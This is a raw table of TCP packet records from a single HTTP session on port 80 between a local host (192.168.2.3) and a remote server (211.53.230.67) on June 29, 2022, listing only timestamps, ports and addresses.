Jun 29, 2022 23:12:03.006772995 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.006788969 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.006794930 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.006807089 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.006812096 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.006824970 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.006835938 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.006843090 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.006856918 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.006874084 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.006886959 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.006892920 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.006911993 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.006920099 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.006931067 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.006939888 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.006951094 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.006968975 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.006975889 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.006988049 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.007005930 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.007013083 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.007024050 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.007041931 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.007054090 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.007060051 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.007076979 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.007085085 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.007093906 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.007111073 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.007114887 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.007128954 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.007144928 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.007147074 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.007163048 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.007179976 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.024918079 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.317151070 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.317179918 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.317198992 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.317215919 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.317291975 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.317336082 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318394899 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318469048 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318486929 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318505049 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318521023 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318536043 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318541050 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318548918 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318556070 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318583965 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318602085 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318623066 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318629980 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318645000 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318645000 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318664074 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318676949 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318684101 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318696022 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318713903 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318717957 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318727970 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318746090 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318762064 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318766117 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318780899 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318798065 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318799973 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318818092 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318828106 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318835974 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318854094 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318856955 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318875074 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318885088 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318892002 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318909883 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318922043 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318923950 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318939924 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318958044 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318959951 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318975925 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.318983078 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.318994999 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319014072 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319030046 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319031954 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319051981 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319067001 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319080114 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319093943 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319106102 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319112062 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319129944 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319142103 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319148064 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319166899 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319185019 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319197893 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319204092 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319220066 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319231987 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319236994 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319256067 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319272995 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319278955 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319292068 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319304943 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319310904 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319323063 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319329023 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319341898 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319360018 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319364071 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319377899 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319397926 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319401979 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319417000 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319432020 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319434881 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319453955 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319466114 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319472075 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319489956 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319503069 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319508076 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319525957 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319526911 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319545984 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319562912 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319570065 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319581985 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319598913 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319607019 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319618940 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319637060 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319642067 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319654942 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319673061 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319680929 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319690943 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319709063 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319715023 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319726944 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319742918 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319745064 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319761038 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319778919 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319786072 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319797039 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319813967 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319818020 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319832087 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319849014 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319854975 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319868088 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319884062 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319895029 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319900990 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319920063 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319928885 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319937944 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319952011 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.319955111 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319973946 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.319991112 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320009947 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320014954 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320028067 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320045948 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320051908 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320064068 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320077896 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320080042 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320099115 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320111036 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320116997 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320135117 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320146084 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320152998 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320171118 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320188046 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320193052 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320207119 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320224047 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320225000 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320240974 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320262909 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320266962 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320281029 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320297956 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320302010 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320317030 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320322037 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320334911 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320353031 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320354939 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320369959 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320386887 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320403099 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320405960 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320420980 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320436001 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320439100 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320456982 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320463896 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320487022 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320496082 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320506096 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320523977 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320538998 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320545912 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320557117 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320574999 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320574999 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320593119 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320610046 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320610046 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320626974 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320642948 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320647955 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320661068 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320677996 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320686102 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320696115 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320712090 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320714951 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320729017 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320745945 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320748091 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320763111 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320780039 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320785046 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320800066 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320816040 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320827961 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320833921 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320851088 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320853949 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320868969 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320884943 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320888996 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320903063 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320920944 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320935965 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320938110 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320954084 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320966959 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.320972919 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.320991039 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.321002960 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.321007967 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.321027040 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.321054935 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.321089029 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.326334000 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.336250067 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.336281061 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.336335897 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.628562927 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.628597975 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.628619909 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.628643036 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.628659964 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.628665924 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.628690004 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.628690958 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.628715992 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.628737926 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.628739119 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.628777027 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.629656076 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.629681110 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.629703999 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.629725933 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.629733086 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.629762888 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632189035 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632215023 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632239103 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632261038 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632268906 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632285118 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632297993 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632313013 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632334948 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632356882 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632363081 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632381916 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632395983 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632406950 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632431030 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632452011 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632452965 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632483959 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632503033 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632512093 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632535934 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632546902 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632559061 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632582903 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632594109 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632606983 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632631063 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632644892 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632657051 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632678986 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632689953 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632704020 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632726908 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632739067 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632750988 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632772923 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632782936 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632796049 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632818937 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632833958 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632844925 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632869005 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632884026 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632894039 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632917881 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632930994 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632941961 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632965088 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.632976055 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.632991076 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633013964 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633028984 CEST	49771	80	192.168.2.3	211.53.230.67
